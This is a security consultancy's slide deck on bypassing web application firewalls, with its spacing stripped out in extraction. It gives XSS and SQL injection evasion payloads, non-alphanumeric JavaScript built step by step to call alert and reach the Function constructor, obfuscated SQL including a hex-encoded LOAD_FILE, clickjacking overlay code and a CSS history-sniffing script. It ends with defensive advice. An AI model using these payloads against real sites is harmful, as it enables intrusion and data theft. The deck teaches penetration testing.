Bypassing Web Application

Firewalls (WAFs)
Ing. Pavol Luptk, CISSP, CEH
Lead Security Consultant

www.nethemba.com
www.nethemba.com

NethembaAllAboutSecurity

HighlyexperiencedcertifiedITsecurityexperts(CISSP,C|EH,SCSecA)
Corebusiness:Allkindsofpenetrationtests,comprehensiveweb
applicationsecurityaudits,localsystemandwifisecurityaudits,security
consulting,forensicanalysis,secureVoIP,ultrasecuresystems
OWASPactivists:LeadersofSlovak/CzechOWASPchapters,coauthors
ofthemostrecognizedOWASPTestingGuidev3.0,workingonnewversion
WearetheonlyoneinSlovakia/CzechRepublicthatoffer:

PenetrationtestsandsecurityauditsofSAP

SecurityauditofsmartRFIDcards

Uniqueownandsponsoredsecurityresearchinmanyareas(see
ourreferencesVulnerabilitiesinpublictransportSMStickets,
crackedthemostusedMifareClassicRFIDcards)

www.nethemba.com

WhatareWAFs?

EmergedfromIDS/IPSfocusedonHTTP
protocolandHTTPrelatedattacks
Usuallycontainalotofcomplexregexprules
tomatch
Supportspecialfeatureslikecookieencryption,
CSRFprotection,etc.
Exceptoffreemod_securitytheyarequite
expensive(andoftenthereisnocorrelation
betweenthepriceandtheirfilteringcapabilities)

www.nethemba.com

WAFsimplementations

Usuallytheyaredeployedinblacklistingmode
thatismorevulnerabletobypassesand
targetedattacks
Applicationcontext(typeofallowedinputs)is
necessarytoknowfordeployingofmoresecure
whitelistingmode
AllWAFscanbybypassed
WAFisjustaworkaround,butfromthesecurity

pointofviewitcanbecosteffective
www.nethemba.com

WAFfilterrules

DirectlyreflectsWAFeffectiveness
FormostWAFvendorstheyareclosely
guardedsecretsmostdeterminedattackers
areabletobypassthemwithoutseeingthe
actualrules
OpensourceWAFs(mod_security,PHPIDS)
haveopensourceruleswhichisbetterfor
morescrutinybyskilledpenetrationtesters

www.nethemba.com

TypicalWAFbypasses
Blocked Attack

Undetected modification

'or 1=1--

' or 2=2--

alert(0)

%00alert(0)

<script>alert(0)</script>

<script type=vbscript>MsgBox(0)</script>

' or ''''='r

'/**/OR/**/''''='

<script>alert(0)</script>

<img src=x:x onerror=alert(0)></img>

<img src=x:x onerror=alert(0)//></img>

<img src=http://url
onload=alert(0)//></img>

1 or 1=1

(1)or(1)=(1)

eval(name)

x=this.name
X(0?$:name+1)

www.nethemba.com

Yes,WAFmaybealsobevulnerable!

WAFalsoincreasestheattacksurfaceofa
targetorganization
WAFmaybethetargetofandvulnerableto
maliciousattacks,e.g.XSS,SQLinjection,
denialofserviceattacks,remotecode
executionvulnerabilities
Thesevulnerabilitieshavebeenfoundinall
typesofWAFproducts(!)

www.nethemba.com

Typicalbypassflow
1.Findoutwhichcharacters/sequencesare
allowedbyWAFs
2.Makeanobfuscatedversionofyourinjected
payload
3.TestitandwatchfortheWAF/application
response
4.Ifitdoesnotwork,modifyitandtrystep2.

www.nethemba.com

Javascriptobfuscation

Javascripthasverypowerfulfeatures

JavascriptpayloadisusedinXSSattacks

Itisfullofevals,expressionclosures,generator
expressions,iterators,specialcharactersand
shortcuts
Supportsalotofencodings(unicode
multibytecharacters,hexadecimal,octal,
combinationofallofthem)
SupportsXOR,Encryption,Base64

www.nethemba.com

Nonalphanumericjavascriptcode
Evenifonlyfewcharactersarealloweditis
possibletoconstructfullyfunctionalcode:

_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")
[$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}
+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"")
[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}
+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}
[$]+"")[__]+(($==$)+"")[___];($)[$$][$$]($$$+"('"+$_$+"')")()

([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)

www.nethemba.com

Let'sbypassWAF!

Examplesituation:WAFblocksalpha
charactersandnumbers(probablynotavery
realsituation,justproofofconcept:)
Allowsonlyfewspecialcharacters(){}_=[];$!
+<>
Let'sgeneratefullynonalphanumericjavascript
code!

www.nethemba.com

PossibilitiesofJavascriptlanguage
Wecanusenumberstoobtainasinglecharacter
inastring,e.g.indexzeroforaccessingthefirst
characterabc[0]

Wecanuseaddition(+),subtraction(),
multiplication(*),division(/),modulus(%),
increment(++),decrement()

Weknowthatmathematicaloperatorsperform
automaticnumericconversionandstring
operatorsperformautomaticstringconversion

www.nethemba.com

Sourceofdifferentalphanumeric
charactersinJavascript

Javascript object /
error state
{}+''

String result
[object Object]

+[][+[]]

NaN

[][+[]]+[]

undefined

[![]]+[]

false

[!![]]+[]

true

www.nethemba.com

ShortestPossibleWaystoCreate
ZerowithoutUsingNumbers
Characters
+[]
+`'`
+`
-[]
-`'`
-`

Result
0
0
0
0
0
0

www.nethemba.com

Generatingnumbers

+[]//0

++[[]][+[]]//1

+!+[]//1

++[++[[]][+[]]][+[]]//2

!+[]+!+[]//2

++[++[++[[]][+[]]][+[]]][+[]]//3

!+[]+!+[]+!+[]//3

www.nethemba.com

Gainalphacharacterswithout
directlyusingthem

WhendefineJavascriptobjectusingtheobject
literalandconcatenatewithstring,theresultis
[objectObject]

_={}+'';//[objectObject]

alert(_[1])//returns'o'character

www.nethemba.com

Generatestringalertwithoutusing
anyalphanumericcharacters

Let'sstartwith'a'

WhatJavascriptobjectcontains'a'?

Wecanuse'NaN'(NotaNumber)

Accessemptystringwithindex0(undefined)
andconverttonumber(NaN)
+[][+[]]//result:NaN

www.nethemba.com

Generating'a'character

NaN[1]='a'

++[[]][+[]]//1

+[][+[]]+[]//resultstring:NaN

(+[][+[]]+[])[++[[]][+[]]]//a

Wehavecharacter'a'

www.nethemba.com

Generating'l'character

Usebooleanfalse

Wecanuse!(NOT)operator

e.g.''==0//true

Useblankarray(string)andthenNOToperator
toobtainboolean,wrapwith[]andconvertitto
string
([![]]+[])//stringfalse

www.nethemba.com

Generating'l'character

++[++[[]][+[]]][+[]]//2

([![]]+[])//stringfalse

'false'[2]=([![]]+[])[++[++[[]][+
[]]][+[]]]//'l'
Wehave'l'character!

www.nethemba.com

Generating'e'character

It'seasy,wecanusebooleantrue

([!![]]+[])//string'true'

++[++[++[[]][+[]]][+[]]][+[]]//3

'true'[3]=([!![]]+[])[++[++[++
[[]][+[]]][+[]]][+[]]]//e
Andwehave'e'character!

www.nethemba.com

Generating'r'character

It'seasy,wecanusebooleantrue

([!![]]+[])//string'true'

++[[]][+[]]//1

'true'[1]=([!![]]+[])[++[[]][+
[]]]//r
Andwehave'r'character!

www.nethemba.com

Generating't'character

It'seasy,wecanusebooleantrue

([!![]]+[])//string'true'

+[]//0

'true'[0]=([!![]]+[])[+[]]//t

Andwehave't'character!

www.nethemba.com

Andnowwehave'alert'string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+
[])[++[++[[]][+[]]][+[]]]+([!![]]+
[])[++[++[++[[]][+[]]][+[]]][+[]]]+
([!![]]+[])[++[[]][+[]]]+([!![]]+
[])[+[]]//string'alert'

www.nethemba.com

Howtoexecutethecodeofourchoice?

Itisnecessarytoreturnwindowobjectto
accessallpropertiesofwindow
Ifyoucanaccesstoaconstructor,youcan
accessFunctionconstructortoexecute
arbitrarycode
Theshortestpossiblewaytogetwindowis:
alert((1,[].sort)())//shows
windowobject!

WorksinallbrowsersexceptIE

www.nethemba.com

Howtogenerate'sort'string

Weknowhowtogeneratestring'alert'

Weneedtogenerate'sort'string
'false'[3]=([![]]+[])[++[++[++[[]]
[+[]]][+[]]][+[]]]//'s'

Wecangain'o'from[]+{}[objectObject]
([]+{})[++[[]][+[]]]//o

Wehavealreadygenerated'r'and't'

www.nethemba.com

Andnowwehave'sort'string
([![]]+[])[++[++[++[[]][+[]]][+[]]][+
[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])
[++[[]][+[]]]+([!![]]+[])[+[]]
//string'sort'

www.nethemba.com

Let'sbuildittogethercallalert(1)

(1,[].sort)().alert(1)
Afterchangingnumber1andallalpha
characterstotheirobfuscatedversionweget:

([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]]
[+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++
[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]
+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+
[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]]
[+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+
([!![]]+[])[+[]]](++[[]][+[]])

//callsalert(1)!

www.nethemba.com

Howtocallanyarbitrary
Javascriptfunction

Usingthearrayconstructor(accessingthe
constructortwicefromanarrayobjectreturns
Function):
[].constructor.constructor(alert(1
))()
Weneedtogeneratetherest'c','n','u'letters,
gainthemfromtheoutputof[].sortfunction:
functionsort(){[nativecode]}

www.nethemba.com

SQLobfuscation

WhatisobfuscationofSQLinjectionvector?
DifferentDBMShavedifferentSQLsyntax,
mostofthemsupportUnicode,Base64,hex,
octalandbinaryrepresentation,escaping,
hashingalgorithms(MD5,SHA1)
Manyblacklistedcharacterscanbereplaced
bytheirfunctionalalternatives(0xA0inMySQL)
Obfuscatedcommentsitisdifficultto

determinewhatisacommentandwhatisnot
www.nethemba.com

SQLobfuscationexamples

SELECTCONCAT(char
(x'70617373',b'11101110110111101110010011
00100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
(M)
SELECT(extractvalue(0x3C613E61646D696E3
C2F613,0x2F61))

www.nethemba.com

NewSQLfeatures

MySQL/PostgreSQLsupportsXMLfunctions:
SELECTUpdateXML('<scriptx=_></script>',
'/script/@x','src=//0x.lv');

HTML5supportslocalDBstorage(SQLite
3.1+)(openDatabaseobject)canbemisused
forpersistentXSS,localSQLinjectionattacks

www.nethemba.com

Existingobfuscationtools

Hackvertorhttp://hackvertor.co.uk/public

HackBar
https://addons.mozilla.org/enUS/firefox/addon/hack

Malzillahttp://malzilla.sourceforge.net/

Yourimagination:)

www.nethemba.com

Summary

WAFsarejustworkarounds!

ThebestsolutionistocareaboutsecurityineverySDLC
phaseandstrictlyvalidateallinputsandoutputsinthe
application
Usewhitelistinginsteadofblacklisting(bothinthe
applicationandWAF!)
Usemultilayersecurity3rdlayerdatabasearchitectureor
databasefirewalls

forSQLusepreparedstatements

forHTMLuseHTMLPurifierorOWASPAntiSamyproject

www.nethemba.com

References

WebApplicationObfuscation
http://www.amazon.com/WebApplicationObfuscati

XSSAttacks:CrossSiteScriptingExploitsand
Defense
http://www.amazon.com/XSSAttacksScriptingExp
SpecialthankstoMarioHeiderichandStefano
DiPaola

www.nethemba.com

UIredressingattacksclickjacking
<style>
iframe{filter:alpha(opacity=0);opacity:0;
position:absolute;top:0px;left0px;
height:300px;width:250px;}
img{position:absolute;top:0px;left:0px;
height:300px;width:250px;}
</style>
<imgsrc=WHATTHEUSERSSEES/>

<iframesrc=WHATTHEUSERISACTUALLYINTERACTING

WITH></iframe>
www.nethemba.com

Clickjackingprotection

BlocksusingXFRAME/OPTIONS:NEVER

<body>
<script>
if(top!=self)document.write('<plaintext>');
</script>
...

www.nethemba.com

CSSHistoryattack
<style>
a{position:relative;}
a:visited{position:absolute;}
</style>
<aid=vhref=http://www.google.com/>Google</a>
<script>
varl=document.getElementById(v);
varc=getComputedStyle(l).position;
c==absolute?alert(visited):alert(notvisited);

</script>

www.nethemba.com

CSSHistoryexploitationmethods

Socialnetworkdeanonymizationattacks

SessionID/CSRFtokenlocalbruteforceattack

LANscanners

FixedinFirefox4.0,currentbrowsersare
vulnerable

www.nethemba.com